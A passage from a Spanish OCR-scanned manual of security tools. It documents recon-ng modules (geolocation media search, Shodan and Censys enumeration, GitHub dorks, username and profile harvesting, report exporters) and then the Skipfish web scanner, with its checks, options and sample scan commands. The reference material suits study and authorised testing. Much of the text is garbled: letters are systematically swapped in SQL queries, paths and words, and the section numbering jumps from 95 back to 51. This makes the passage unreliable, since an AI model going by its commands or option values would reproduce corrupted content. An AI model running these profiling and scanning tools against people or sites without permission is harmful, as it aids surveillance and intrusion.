Ruta: modules/recon/locations-pushpins/twitter.py 

Keys: twitter_api, twitter_secret 

Descripción: Busca en Twitter medios en la proximidad especificada a una ubicación. 

Opciones: 


Nombre 

Valor actual 

Requerido 

Descripción 

RADIUS 

1 

Si 

Radio en kilómetros 

SOURCE 

default 

Si 

Origen de entrada 


Opciones del origen: 

default SEEECT DISTINCT latitude H longitude EROM locations WHERE latitude IS 
NOT NUEE AND longitude IS NOT NUEE 
<string> cadena que representa una sola entrada 
<path> ruta a un archivo que contiene una lista de entradas 
query <sql> consulta de base de datos que devuelve una columna de entradas 

70. YouTube Geolocation Search 

Ruta: modules/recon/locations-pushpins/youtube.py 

Keys: google api 

Descripción: Busca en la API de YouTube los medios en la proximidad especificada a una 
ubicación. 

Opciones: 


Nombre 

Valor actual 

Requerido 

Descripción 

RADIUS 

1 

Si 

Radio en kilómetros 

SOURCE 

default 

Si 

Origen de entrada 


Opciones del origen: 

default SEEECT DISTINCT latitude H longitude EROM locations WHERE latitude IS 
NOT NUEE AND longitude IS NOT NUEE 
<string> cadena que representa una sola entrada 
<path> ruta a un archivo que contiene una lista de entradas 
query <sql> consulta de base de datos que devuelve una columna de entradas 


71. Whois Company Harvester 






Ruta: modules/recon/netblocks-companies/whois_orgs.py 

Descripción: Utiliza el ARIN Whois RWS para recolectar datos de empresas de consultas whois 
para el bloque de red dado. Actualiza la tabla de 'companies' con los resultados. 

Opciones: 


Nombre 

Valor actual 

Requerido 

Descripción 

SOURCE 

default 

Si 

Origen de entrada 


Opciones del origen: 

default SELECT DISTINCT netblock EROM netblocks WHERE netblock IS NOT NULE 

<string> cadena que representa una sola entrada 

<path> ruta a un archivo que contiene una lista de entradas 

query <sql> consulta de base de datos que devuelve una columna de entradas 

72. Reverse Resolver 

Ruta: modules/recon/netblocks-hosts/reverse_resolve.py 

Descripción: Realiza una búsqueda inversa para cada una de las direcciones IP de un netblock para 
resolver el nombre del dispositivo. Actualiza la tabla ’hosts' con los resultados. 

Opciones: 


Nombre 

Valor actual 

Requerido 

Descripción 

SOURCE 

default 

Si 

Origen de entrada 


Opciones del origen: 

default SEEECT DISTINCT netblock EROM netblocks WHERE netblock IS NOT NULE 

<string> cadena que representa una sola entrada 

<path> ruta a un archivo que contiene una lista de entradas 

query <sql> consulta de base de datos que devuelve una columna de entradas 

73. Shodan NetWork Enumerator 

Ruta: modules/recon/netblocks-hosts/shodan net.py 

Keys: shodan api 

Descripción: Cosecha los dispositivos de la API de Shodan utilizando el operador de búsqueda 
’net'. Actualiza la tabla ’hosts' con los resultados. 

Opciones: 


Nombre 

Valor actual 

Requerido 

Descripción 

LIMIT 

1 

Si 

Limite de solicitudes de API por fuente de 
entrada (0 = ilimitado) 

SOURCE 

default 

Si 

Origen de entrada 


Opciones del origen: 

default SELECT DISTINCT netblock EROM netblocks WHERE netblock IS NOT NULE 

<string> cadena que representa una sola entrada 

<path> ruta a un archivo que contiene una lista de entradas 

query <sql> consulta de base de datos que devuelve una columna de entradas 

74. Virustotal domains extractor 

Ruta: modules/recon/netblocks-hosts/virustotal.py 

Keys: virustotal api 

Descripción: Cosecha dominios de Virustotal utilizando la API de informes. Actualiza la tabla 
’hosts' con los resultados. 

Opciones: 


Nombre 

Valor actual 

Requerido 

Descripción 

INTERVAL 

15 

Si 

Intervalo en segundos entre solicitudes de API 

SOURCE 

default 

Si 

Origen de entrada 







Opciones del origen: 

default SELECT DISTINCT netbloek EROM netbloeks WHERE netbloek IS NOT NULE 
<string> eadena que representa una sola entrada 
<path> ruta a un arehivo que eontiene una lista de entradas 
query <sql> eonsulta de base de datos que devuelve una eolumna de entradas 

75. Internet Census 2012 Eookup 

Ruta: modules/reeon/netbloeks-ports/eensus_2012.py 

Deseripeión: Consulta los datos del Censo de Internet 2012 a través de Exfiltrated.eom para 
enumerar los puertos abiertos para un bloque de red. 

Opeiones: 


Nombre 

Valor aetual 

Requerido 

Deseripeión 

SOURCE 

default 

Si 

Origen de entrada 


Opeiones del origen: 

default SEEECT DISTINCT netbloek EROM netbloeks WHERE netbloek IS NOT NULE 
<string> eadena que representa una sola entrada 
<path> ruta a un arehivo que eontiene una lista de entradas 
query <sql> eonsulta de base de datos que devuelve una eolumna de entradas 
Comentarios: 

* http://exfiltrated.oom/querystart.php 

76. Censys.io Netbloek Enumerator 

Ruta: modules/reoon/netblooks-ports/oensysio.py 

Keys: oensysio_id, oensysio_seoret 

Deseripeión: Consulta la API oensys.io para enumerar informaoión sobre netbloeks. 

Opciones: 


Nombre 

Valor aetual 

Requerido 

Deseripeión 

LIMIT 

True 

Si 

Limitaeión de veloeidad de alternaneia 

RATE 

0,2 

Si 

Tasa de fuga del punto final de búsqueda 
(tokens / segundo) 

SOURCE 

default 

Si 

Origen de entrada 


Opeiones del origen: 

default SELECT DISTINCT netbloek EROM netbloeks WHERE netbloek IS NOT NULE 
<string> eadena que representa una sola entrada 
<path> ruta a un arehivo que eontiene una lista de entradas 
query <sql> eonsulta de base de datos que devuelve una eolumna de entradas 
Comentarios: 

* Para enumerar los puertos para los dispositivos, usar la siguiente eonsulta eomo la opeión 
SOURCE. 

- SELECT DISTINCT ip address || '/32' EROM hosts WHERE ip address IS NOT NULE 

* Las tasas de fugas pueden variar. La tasa de fuga de eada usuario apareee en su euenta Censys.io. 

77. Ports to Hosts Data Migrator 

Ruta: modules/reoon/ports-hosts/migrate_ports.py 

Deseripeión: Agrega un nuevo dispositivo para todos los nombres de host almaeenados en la tabla 
de 'ports'. 

Opeiones: No hay. 

78. Dev Diver Repository Aetivity Examiner 
Ruta: modules/reeon/profdes-eontaets/dev_diver.py 

Deseripeión: Busea repositorios de eódigo públieo para obtener informaeión sobre un nombre de 





usuario determinado. 
Opciones: 


Nombre 

Valor actual 

Requerido 

Descripción 

SOURCE 

default 

Si 

Origen de entrada 


Opciones del origen: 

default SELECT DISTINCT username EROM profdes WHERE usemame IS NOT NULE 

<string> cadena que representa una sola entrada 

<path> ruta a un archivo que contiene una lista de entradas 

query <sql> consulta de base de datos que devuelve una columna de entradas 

79. Github Profile Harvester 

Ruta: modules/recon/profdes-contacts/github_users.py 
Keys: github api 

Descripción: Utiliza la API de Github para recopilar información del usuario de los perfiles 
recopilados. Actualiza la tabla de 'contacts' con los resultados. 

Opciones: 


Nombre 

Valor actual 

Requerido 

Descripción 

SOURCE 

default 

Si 

Origen de entrada 


Opciones del origen: 

default SEEECT DISTINCT username EROM profiles WHERE usemame IS NOT NULE 
AND resource LIKE 'Github' 

<string> cadena que representa una sola entrada 

<path> mta a un archivo que contiene una lista de entradas 

query <sql> consulta de base de datos que devuelve una columna de entradas 

80. NameChk.com Usemame Validator 

Ruta: modules/recon/profiles-profiles/namecbk.py 

Descripción: Aprovecha NameChk.com para validar la existencia de nombres de usuario en sitios 
web especificos y actualiza la tabla de 'profiles' con los resultados. 

Opciones: 


Nombre 

Valor actual 

Requerido 

Descripción 

SOURCE 

default 

Si 

Origen de entrada 


Opciones del origen: 

default SELECT DISTINCT username EROM profiles WHERE usemame IS NOT NULE 
<string> cadena que representa una sola entrada 
<path> mta a un archivo que contiene una lista de entradas 
query <sql> consulta de base de datos que devuelve una columna de entradas 
Comentarios: 

* Nota: Es posible que sea necesario aumentar la opción de tiempo de espera global para admitir 
sitios más lentos. 

81. OSINT HUMINT Profile Collector 
Ruta: modules/recon/profdes-profdes/profiler.py 

Descripción: Toma cada nombre de usuario de la tabla de perfiles y busca una variedad de sitios 
web para esos usuarios. La lista de sitios válidos proviene del proyecto principal en 
https://github.com/WebBreacher/WhatsMyName 
Opciones: 


Nombre 

Valor actual 

Requerido 

Descripción 

SOURCE 

default 

Si 

Origen de entrada 


Opciones del origen: 

default SELECT DISTINCT username EROM profiles WHERE usemame IS NOT NULE 







<string> cadena que representa una sola entrada 
<path> ruta a un archivo que eontiene una lista de entradas 
query <sql> eonsulta de base de datos que devuelve una eolumna de entradas 
Comentarios: 

* Nota: es posible que sea neeesario aumentar la opeión de tiempo de espera global para admitir 
sitios más lentos. 

* Adverteneia: el uso de este módulo detrás de un proxy de fdtrado puede eausar falsos negativos 
ya que algunos de estos sitios pueden estar bloqueados. 

82. Twitter Mentioned 

Ruta: modules/reeon/profdes-profdes/twitter mentioned.py 
Keys: twitter_api, twitter_seoret 

Deseripeión: Aprovecha la API de Twitter para enumerar los usuarios que meneionaron el 
identificador dado. Actualiza la tabla de 'profiles' con los resultados. 

Opeiones: 


Nombre 

Valor aetual 

Requerido 

Deseripeión 

LIMIT 

Tme 

Si 

Limitación de veloeidad de alternancia 

SOURCE 

default 

Si 

Origen de entrada 


Opeiones del origen: 

default SELECT DISTINCT username EROM profiles WHERE usemame IS NOT NULE 
AND resouree EIKE 'Twitter' COEEATE NOCASE 
<string> eadena que representa una sola entrada 
<path> ruta a un arehivo que eontiene una lista de entradas 
query <sql> eonsulta de base de datos que devuelve una eolumna de entradas 
Comentarios: 

* Twitter limita el historial de búsqueda de tweets a 7 días. 

83. Twitter Mentions 

Ruta: modules/reeon/profiles-profiles/twitter mentions.py 
Keys: twitter_api, twitter_seeret 

Deseripeión: Aproveeha la API de Twitter para enumerar los usuarios meneionados por el 
identifieador estableeido. Aetualiza la tabla de 'profiles' eon los resultados. 

Opeiones: 


Nombre 

Valor aetual 

Requerido 

Deseripeión 

LIMIT 

Tme 

Si 

Limitaeión de veloeidad de alternaneia 

SOURCE 

default 

Si 

Origen de entrada 


Opeiones del origen: 

default SEEECT DISTINCT username EROM profiles WHERE usemame IS NOT NULE 
AND resouree EIKE 'Twitter' COLEATE NOCASE 
<string> eadena que representa una sola entrada 
<path> mta a un arehivo que contiene una lista de entradas 
query <sql> consulta de base de datos que devuelve una columna de entradas 
Comentarios: 

* Twitter limita el historial de búsqueda de tweets a 7 días. 

84. Github Code Enumerator 

Ruta: modules/reeon/profdes-repositories/github repos.py 
Keys: github api 

Deseripeión: Utiliza la API de Github para enumerar repositorios y lo eseneial de un usuario de 
Github. Aetualiza la tabla de 'repositories' eon los resultados. 

Opeiones: 





Nombre 

Valor aetual 

Requerido 

Deseripeión 

SOURCE 

default 

Si 

Origen de entrada 


Opciones del origen; 

default SELECT DISTINCT username EROM profdes WHERE usemame IS NOT NULE 
AND resouree EIKE 'Github' 

<string> eadena que representa una sola entrada 
<path> ruta a un arehivo que eontiene una lista de entradas 
query <sql> eonsulta de base de datos que devuelve una eolumna de entradas 

85. Gitbub Commit Seareber 

Ruta: modules/reeon/repositories-profdes/gitbub eommits.py 
Keys: gitbub api 

Deseripeión: Eltibza la API de Gitbub para reeopilar perfiles de usuario de eonfirmaeiones de 
repositorio. Aetualiza la tabla de 'profiles' eon los resultados. 

Opeiones: 


Nombre 

Valor aetual 

Requerí 

do 

Deseripeión 

AUTHOR 

True 

Si 

Extraer la informaeión del autor 

COMMITTER 

True 

Si 

Extraer informaeión del eonfirmador 

MAXPAGES 

1 

Si 

Número máximo de páginas de eonfirmaeión para 
proeesar para eada repositorio (0 = ilimitado) 

SOURCE 

default 

Si 

Origen de entrada 


Opeiones del origen: 

default SEEECT DISTINCT owner, ñame EROM repositories WHERE resouree EIKE 
'Gitbub' AND eategory EIKE 'repo' 

<string> eadena que representa una sola entrada 

<patb> ruta a un arebivo que eontiene una lista de entradas 

query <sql> eonsulta de base de datos que devuelve una eolumna de entradas 

86. Gitbub Gist Seareber 

Ruta: modules/reeon/repositories-vulnerabibties/gists_seareb.py 

Deseripeión: Utiliza la API de Gitbub para deseargar y busear en Gists posibles divulgaeiones de 
informaeión. Aetualiza la tabla de 'vulnerabilities' eon los resultados. 

Opeiones: 


Nombre 

Valor aetual 

Reque 

rido 

Deseripeión 

KEYWORDS 

/usr/sbare/reeon- 

ng/data/ gist_key words .txt 

Si 

arehivo que eontiene una lista de palabras 
elave 

SOURCE 

default 

Si 

Origen de entrada 


Opeiones del origen: 

default SEEECT DISTINCT url EROM repositories WHERE url IS NOT NULE AND 
resouree EIKE 'Gitbub' AND eategory EIKE 'gisf 
<string> eadena que representa una sola entrada 
<patb> ruta a un arebivo que eontiene una lista de entradas 
query <sql> consulta de base de datos que devuelve una eolumna de entradas 
Comentarios: 

* Las búsquedas generales son sensibles a mayúseulas y minúseulas. Ineluya todas las 
permutaeiones deseadas en la lista de palabras elave. 


87. Gitbub Dork Analyzer 






Ruta: modules/recon/repositories-vulnerabilities/github_dorks.py 
Keys: github api 

Descripción: Utiliza la API de Github para buscar posibles vulnerabilidades en el código fuente al 
aprovechar Github Dorks y el operador de búsqueda ’repo'. Actualiza la tabla de 'vulnerabilities' con 
los resultados. 

Opciones: 


Nombre 

Valor actual 

Reque 

rido 

Descripción 

DORKS 

/usr/share/recon- 

ng/data/ github_dorks. txt 

Si 

archivo que contiene una lista de github 
dorks 

SOURCE 

default 

Si 

Origen de entrada 


Opciones del origen: 

default SELECT DISTINCT owner ||'/' || ñame EROM repositories WHERE ñame IS NOT 
NUEE AND resource EIKE 'Github' AND category EIKE 'repo' 

<string> cadena que representa una sola entrada 

<path> ruta a un archivo que contiene una lista de entradas 

query <sql> consulta de base de datos que devuelve una columna de entradas 

Módulos de informes 

88. CSV Elle Creator 


Ruta: modules/reporting/csv.py 

Descripción: Crea un archivo CSV que contiene los datos recolectados especificados. 
Opciones: 


Nombre 

Valor actual 

Reque 

rido 

Descripción 

EILENAME 

/root/.recon- 

ng/workspaces/default/result 

s.csv 

Si 

ruta y nombre de archivo para la salida 

HEADERS 

Ealse 

Si 

Incluir las cabeceras de la columna 

TABEE 

hosts 

Si 

tabla fuente de datos a exportar 


89. HTML Report Generator 
Ruta: modules/reporting/html.py 
Descripción: Crea un informe HTML. 
Opciones: 


Nombre 

Valor actual 

Reque 

rido 

Descripción 

CREATOR 


Si 

nombre del creador para el pie de página 
del informe 

CUSTOMER 


Si 

nombre del cliente para el encabezado del 
informe 

EILENAME 

/root/.recon- 

ng/workspaces/default/result 

s.html 

Si 

ruta y nombre de archivo para la salida del 
informe 

SANITIZE 


Si 

enmascarar datos confidenciales en el 
informe 


90. JSON Report Generator 
Ruta: modules/reporting/json.py 






Descripción: Crea un informe JSON. 
Opciones: 


Nombre 

Valor actual 

Reque 

rido 

Descripción 

ElLENAME 

/root/.recon- 

ng/workspaces/default/result 

s.json 

Si 

ruta y nombre de archivo para la salida del 
informe 

TABLE 

hosts, contacts, credentials 

Si 

lista delimitada por comas de tablas 


91, List Creator 

Ruta: modules/reporting/list.py 

Descripción: Crea un archivo que contiene una lista de registros de la base de datos. 
Opciones: 


Nombre 

Valor actual 

Reque 

rido 

Descripción 

COEUMN 

ipaddress 

Si 

columna fuente de datos para la lista 

ElLENAME 

/root/.recon- 

ng/workspaces/default/list.tx 

t 

Si 

ruta y nombre de archivo para la salida 

NUEES 

Ealse 

Si 

incluir nulos en el conjunto de datos 

TABEE 

hosts 

Si 

tabla de datos fuente para la lista 

UNIQUE 

Truc 

Si 

solo devuelve elementos únicos del 
conjunto de datos 


92. Proxifier 

Ruta: modules/reporting/proxifier.py 

Descripción: Solicita las URLs de la base de datos con el fin de completar un proxy en linea. 
Requiere que la opción de proxy global se configure antes de ejecutar el módulo. 

Opciones: 


Nombre 

Valor actual 

Requerido 

Descripción 

SOURCE 

default 

Si 

Origen de la entrada 


Opciones del origen: 

default SELECT example EROM vulnerabilities WHERE category='Google Dork' 

<string> cadena que representa una sola entrada 

<path> ruta a un archivo que contiene una lista de entradas 

query <sql> consulta de base de datos que devuelve una columna de entradas 

93. PushPin Report Generator 
Ruta: modules/reporting/pushpin.py 

Descripción: Crea medios HTML e informes de mapas para todos los PushPins almacenados en la 
base de datos. 

Opciones: 


Nombre 

Valor actual 

Requ 

crido 

Descripción 

EATITUDE 


Si 

Eatitud del epicentro 

EONGITUDE 


Si 

Eongitud del epicentro 

MAPEIEENAME 

/root/.recon- 

ng/workspaces/default/push 
pin map.html 

Si 

ruta y nombre de archivo para el 
informe de mapa de pushpin 







MEDIAFILENAME 

/root/.recon- 

ng/workspaces/default/push 
pin media.html 

Si 

ruta y nombre para el informe del 
medio de pushpin 

RADIUS 


Si 

Radio del epicentro en kilómetros 


94. XLSX File Creator 
Ruta: modules/reporting/xlsx.py 

Descripción: Crea un archivo XLSX compatible con Excel que contiene todo el conjunto de datos. 
Opciones: 


Nombre 

Valor actual 

Requerido 

Descripción 

EILENAME 

/root/.recon- 

ng/workspaces/defaul 

t/results.xlsx 

Si 

ruta y nombre de archivo para la salida 
del informe 


95. XML Report Generator 
Ruta: modules/reporting/xml.py 
Descripción: Crea un informe XML. 
Opciones: 


Nombre 

Valor actual 

Requerido 

Descripción 

EILENAME 

/root/.recon- 

ng/workspaces/defaul 

t/results.xml 

Si 

ruta y nombre de archivo para la salida 
del informe 

TABEES 

hosts, contacts, 
credentials 

Si 

lista delimitada por comas de las tablas 






51. Skipfish 


Skipfish es una herramienta de reconoeimiento activo de seguridad de aplicaciones web. Esta 
herramienta prepara un mapa interactivo del sitio objetivo llevando a cabo un rastreo recursivo y 
sondas basadas en diccionario. Entonces el mapa resultante es anotado con la salida de una serie de 
activos no disruptivos de controles de seguridad. El informe final generado por la herramienta es 
destinado a servir como base para la seguridad profesional de las evaluaciones de las aplicaciones 
web. 

Eleva incorporadas varias listas de palabras con extensión wl. Dado que sus contenidos puede 
cambiar durante la ejecución de skipfish, es recomendable hacer una copia en el escritorio con 
> cp médium.wl -/Desktop/medium.wl antes de la ejecución de skipfish. El fichero pivots.txt 
contiene todas las URLs visitadas. 

Una serie de herramientas comerciales y de código abierto con funcionalidad análoga están 
fácilmente disponibles, por ejemplo, Nikto, Nessus. Dicho esto, skipfish intenta abordar algunos de 
los problemas comunes asociado con los escáneres de seguridad web. Las ventajas específicas de 
skipfish incluyen: 

* Alto rendimiento: se han observado más de 500 solicitudes por segundo frente a los objetivos 
receptivos de Internet, más de 2000 solicitudes por segundo en redes LAN/MAN y más de 7000 
solicitudes contra instancias locales con una CPU muy modesta, red y huella de memoria. Esto se 
puede atribuir a: 

* La multiplexación de E/S de la red de un solo thread, totalmente asincrono y un modelo de 
procesamiento de datos que elimina la gestión de memoria, la programación y las 
ineficiencias de IPC presentes en algunos clientes multiproceso. 

* Las funciones avanzadas de HTTP/1.1 como solicitudes de rango, compresión de 
contenido y conexiones keep-alive, así como el límite del tamaño de respuesta forzada para 
mantener bajo control la sobrecarga a nivel de red. 

* El almacenamiento en caché de la respuesta inteligente y la heurística avanzada del 
comportamiento del servidor se utilizan para minimizar el tráfico innecesario 

* La implementación C orientada al rendimiento, pura, que incluye una pila HTTP a medida. 

* Facilidad de uso: skipfish es altamente adaptable y confiable. Las características del escáner son: 

* Reconocimiento heurístico del manejo de parámetros oscuros basados en rutas y esquemas 
de consultas. 

* Manejo elegante de sitios multi-framework donde determinadas mtas obedecen a una 
semántica completamente diferente o están sujetos a reglas de filtrado diferente. 

* Construcción automática de listas de palabras basada en el análisis de contenido del sitio. 

* Funciones de escaneo probabilístico para permitir evaluaciones periódicas y limitadas en 
el tiempo de sitios arbitrariamente complejos. 

* Controles de seguridad bien diseñados: la herramienta está destinada a proporcionar 
información precisa y resultados significativos: 

* Los diccionarios a medida ofrecen una excelente cobertura y permiten unas 
pmebas minuciosas $keyword.$extension en un plazo razonable. 

* Se prefieren las sondas diferenciales de 3 pasos a las comprobaciones de firma para 
detectar vulnerabilidades 

* La lógica del estilo ratproxy se usa para detectar problemas sutiles de seguridad: 
falsificación de solicitudes entre sitios, inclusión de Scripts entre sitios, contenido 
mixto, emisión de desajustes MIME y de caracteres, directivas de almacenamiento en 
caché incorrectas, etc. 



* Los controles de seguridad incluidos están diseñados para manejar escenarios 
difíciles: XSS almacenado (ruta, parámetros, encabezados), inyección oculta de SQL 
o XML o inyección de shell blind. 

* Firmas de contenido de estilo Snort que resaltarán los errores del servidor, fugas de 
información o aplicaciones web potencialmente peligrosas. 

* El procesamiento posterior de informes reduce drásticamente el ruido causado por 
cualquier falso positivo o otros trucos del servidor identificando repetitivos patrones. 

Pruebas específicas que ímplementa 

* Fallos de alto riesgo que potencialmente pueden comprometer el sistema: 

* Inyección de consultas del lado del servidor incluidos vectores blind y parámetros 
numéricos. 

* Sintaxis explícita similar a SQL en parámetros GET o POST. 

* Inyección de comandos de shell del lado del servidor incluidos vectores blind. 

* Inyección XML / XPath del lado del servidor incluidos los vectores blind. 

* Vulnerabilidades de formato de cadena. 

* Vulnerabilidades de desbordamiento de enteros. 

* Ubicaciones que aceptan HTTP PUT. 

* Fallos de riesgo medio que potencialmente pueden comprometer los datos: 

* Vectores XSS almacenados y reflejados en el cuerpo del documento. Soporte mínimo de 
JS XSS. 

* Vectores XSS almacenados y reflejados a través de redireccionamientos HTTP. 

* Vectores XSS almacenados y reflejados a través de la división del encabezado HTTP. 

* Directorio traversal / LEI / REI incluidos vectores restringidos. 

* Varios PDI de archivos (fuentes del lado del servidor, configuraciones, etc.). 

* Script proporcionado por el atacante y vectores de inclusión CSS almacenados y 
reflejados. 

* Script externo no confiable y vectores de inclusión CSS. 

* Problemas de contenido mixto en script y recursos CSS. 

* Formularios de contraseña que se envían desde o hacia páginas que no son SSL. 

* Tipos MIME incorrectos o que faltan en renderizables. 

* Tipos MIME genéricos en renderizables. 

* Conjuntos de caracteres incorrectos o que faltan en renderizables. 

* Conflicto de información MIME/charset en renderizables. 

* Directivas de caché incorrectas en las respuestas de configuración de cookies. 

* Problemas de bajo riesgo: 

* Directorio que enumera los vectores de derivación. 

* Redirección a las URL almacenadas y reflejadas proporcionadas por el atacante. 

* Contenido incrustado almacenado y reflejado proporcionado por el atacante. 

* Contenido incrustado externo no confiable. 

* Contenido mixto en recursos no programables. 

* HTTPS -> Envío HTTP de formularios HTML. 

* Credenciales HTTP en URL. 

* Certificados SSL caducados o aún no válidos. 

* Formularios HTML sin protección XSRF. 

* Certificados SSL autofirmados. 

* El nombre del dispositivo del certificado SSL no coincide. 

* Directivas de almacenamiento en caché incorrectas en contenido menos sensible. 



Entradas informativas no específicas 


* Información general del certificado SSL. 

* Cambio significativo de cookies HTTP. 

* Cambio de encabezados de servidor, vía o X -... 

* Nuevas firmas 404. 

* Recursos a los que no se puede acceder. 

* Recursos que requieren autenticación HTTP. 

* Enlaces rotos. 

* Errores del servidor. 

* Todos los enlaces externos no clasificados de otra manera. 

* Todos los correos electrónicos externos. 

* Todos los redireccionadores de URL externos. 

* Enlaces a protocolos desconocidos. 

* Campos de formulario que no se pudieron completar automáticamente. 

* Eormas de ingreso de contraseña para fuerza bruta externa. 

* Eormularios de subida de archivos. 

* Otros formularios HTML. 

* Nombres de archivos numéricos para fuerza bruta externa. 

* Enlaces proporcionados por el usuario que se muestran en una página. 

* Tipo MIME incorrecto o que falta en contenido menos significativo. 

* Tipo MIME genérico en contenido menos significativo. 

* Juego de caracteres incorrecto o que falta en contenido menos significativo. 

* Información MIME/charset conflictiva sobre contenido menos significativo. 

* Convenciones de paso de parámetros tipo OGNL. 

Junto con una lista de problemas identifieados, skipfish también proporeiona un resumen de tipos 
de doeumentos y tipos de problemas eneontrados y un interactivo mapa del sitio, con nodos 
descubiertos a través de la fuerza bruta denotada en una forma distintiva. 

Empleo 

Uso: skipfish [opeiones ... ] -W wordlist -o output dir start url [ start_url2 ... ] 

Opciones de autenticaeión y acceso: 


-A user:pass 

Utilizar las credenciales de autenticaeión HTTP especificadas 

-F host=IP 

Resolver los dispositivos con las direcciones IP 

-C name=val 

Añadir una cookie personalizada a todas las solicitudes 

-H name=val 

Añadir un eneabezado HTTP personalizado a todas las solicitudes 

-b (i|ílp) 

Utilizar encabezados eompatibles eon MSIE / Firefox / iPhone 

-N 

No aceptar ninguna nueva cookie 

—auth-form url 

URL de autenticación de formulario 

—auth-user user 

Usuario de autentieación de formulario 

—auth-pass pass 

Contraseña de autentieaeión de formulario 

—auth-verify-url 

URL para la deteeción en la sesión 




Opciones de aleanee de rastreo: 


-d maxdepth 

Profundidad máxima del árbol de rastreo. Por defeeto 16 

-e max ehild 

Máximo de hijos al indiee por nodo. Por defeeto 512 

-X max dese 

Máximos deseendientes a indiee por rama. Por defeeto 8192 

-r r limit 

Número total máximo de solieitudes a enviar. Por defeeto 
100000000 

-p erawl% 

Probabilidad de rastreo de nodos y enlaees. Por defeeto 100% 

-q hex 

Repetir la exploraeión probabilistiea eon una semilla 
determinada 

-I string 

Solo seguir las URL que eoineidan eon 'string' 

-X string 

Exeluir las URL que eoineidan eon 'string' 

-K string 

No fuzz parámetros llamados 'string' 

-D domain 

Rastrear enlaees de sitios eruzados a otro dominio 

-B domain 

Confiar, pero no rastrear, otro dominio 

-Z 

No deseender a lugares 5xx 

-0 

No enviar ningún formulario 

-P 

No analizar HTML, ete, para eneontrar nuevos enlaees 


Opeiones de informe: 


-0 dir 

Eseribir la salida en el direetorio espeeifieado. Obligatorio. 

-M 

Registrar avisos sobre eontenido mixto/eontraseñas no SSE 

-E 

Registrar todos los desajustes de intento de almaeenamiento en eaehé de 
HTTP/l.O/HTTP/l.l 

-U 

Registrar todas las direeeiones URL externas y eorreos eleetrónieos 
vistos 

-Q 

Suprimir eompletamente los nodos duplieados en los informes. 

-u 

Estar tranquilo, deshabilitar las estadistieas de progreso en tiempo real 

-V 

Modo verboso 


Opeiones de gestión del dieeionario: 


-W wordlist 

Usar una lista de palabras de leetura/eseritura espeeifieada. 
Obligatorio. 

-S wordlist 

Cargar una lista de palabras de solo leetura suplementaria 

-E 

No aprender automátieamente nuevas palabras elave para el sitio 

-Y 

No fuzz extensiones en el direetorio de fuerza bruta 

-R age 

Eas palabras de purga golpean más que las exploraeiones de 'age' 

-T name=val 

Añadir nueva regla de autoeompletar formulario 

-G max guess 

Número máximo de eonjeturas de palabras elave a mantener. 







Por defeeto 256 

-z sigfile 

Cargar firmas desde este arehivo 


Configuración de rendimiento: 


-g max eonn 

Conexiones TCP máximas simultáneas, globales. Por defeeto 40 

-m host eonn 

Máximo de eonexiones simultáneas por IP objetivo. Por defeeto 10 

-f max fail 

Número máximo de errores HTTP eonsecutivos. Por defeeto 100 

-t req_tmout 

Tiempo de espera total de respuesta de solicitud. Por defecto 20 seg 

-w rw tmout 

Tiempo de espera de E/S de red individual. Por defeeto 10 seg 

-i idle tmout 

Tiempo de espera en eonexiones HTTP inaetivas. Por defeeto 10 seg 

-s s limit 

Eimite de tamaño de respuesta. Por defeeto 400000 B 

-e 

No guardar respuestas binarias para reportar 


Otras opeiones: 


-1 max req 

Número máximo de solicitudes por segundo 

-k duration 

Detener el eseaneo después de la duraeión dada h: m: s 

—eonfig file 

Cargar el archivo de eonfiguración espeeifieado 


Ejecución 

Una vez que se haya seleeeionado el dieeionario, se puede usar la opeión -S para eargar este 
dieeionario y la opeión -W para espeeifiear un arehivo inieialmente vaeio para eualquier sitio 
espeeifieo recién aprendido palabras clave: 

$ toueh new_diet.wl 

$ ./skipfish -o output_dir -S existing_dietionary.wl -W new_diet.wl \ 
http://www.example.com/some/starting/path.txt 

Se puede usar la opeión -W, si no desea almaeenar palabras elave aprendidas automátieamente en 
eualquier lugar. Tener en euenta que se puede proporeionar más de una URL de inieio si asi se desea 
y en eonsecueneia todo ellos serán rastreados. También es posible leer las URL de un archivo 
utilizando la siguiente sintaxis: 

$ ./skipfish [...other options...] @../path/to/url_list.txt 

La herramienta mostrará algunas estadísticas útiles mientras el escaneo está en progreso. También 
se puede eambiar a una lista de solieitudes HTTP sobre la mareha presionando la teela Enter. 

En el ejemplo anterior, skipfish escaneará todo el www.example.eom ineluidos los servicios en 
otros puertos, si están vinculados desde la página principal y escribe un informe en 
output dir/index.html. Después se puede ver este informe eon su navegador favorito. En este 
navegador debe estar habilitado Javaseript y debido a la reeiente file:/// mejoras de seguridad en 
determinados navegadores, es posible que se deba aeeeder resultados a través de HTTP. El archivo 
index.html es estátieo y los resultados reales se almaeenan eomo una jerarquía de arehivos JSON, 
adeeuados para el proeesamiento de máquinas o diferentes presentaeiones frontales. Además una 






lista de todos las URLs descubiertas se guardarán en otro archivo, pivots.txt, para un fácil 
procesamiento posterior. 

Se puede usar un script complementario simple, sfscandiíf, para ver las diferencias entre 2 escaneos 
ejecutados contra el mismo objetivo con las mismas opciones. El informe más nuevo será anotado 
de manera no destructiva agregando fondo rojo a todos nodos nuevos o modificados y fondo azul 
para todos los problemas nuevos o modificados que se encontraron. 

Algunos sitios pueden requerir autenticación para la cual se describe nuestro soporte en 
doc/autenticacion.txt. En la mayoría de los casos, se querrá usar el método de autenticación de 
formulario que es capaz de detectar sesiones rotas para volver a autenticar. 

Una vez autenticado, determinadas URLs en el sitio pueden cerrar la sesión. Se puede combatir esto 
de 2 maneras: usando la opción -N, que hace que el escáner rechace los intentos de establecer o 
eliminar cookies o con la opción -X, que evita que se busquen URLs coincidentes: 

$ ./skipfish -X/logout/logout.aspx ...otros parámetros... 

La opción -X también es útil para acelerar los escaneos al excluir / icons/, /do /, /manuals/ y otras 
ubicaciones estándar y mundanas a lo largo de estas líneas. En general se puede usar la opción -X e 
-I, solo si el crawl de URL coincide con una subcadena para limitar el alcance de un escaneo 
incluida la restricción solo a un protocolo y a un puerto específico: 

$ ./skipfish -I http://example.com: 1234/ ...otros parámetros... 

La opción -K permite especificar nombres de parámetros para no fuzz, útil para aplicaciones que 
colocan ID de sesión en la URL, para minimizar el ruido. 

Otra opción útil es -D, que permite especificar más hosts o dominios a considerar dentro del alcance 
de la prueba. Por defecto, todos los dispositivos que aparecen en las URLs de la línea de comandos 
se agregan a la lista, pero se puede usar la opción -D para ampliar estas reglas, por ejemplo: 

$ ./skipfish -D test2.example.com -o output-dir http://testl.example.com/ 

o para una coincidencia de comodín de dominio, usar: 

$ ./skipfish -D .example.com -o output-dir http://testl.example.com/ 

En algunos casos no se desea rastrear realmente un dominio de terceros, pero confia en el 
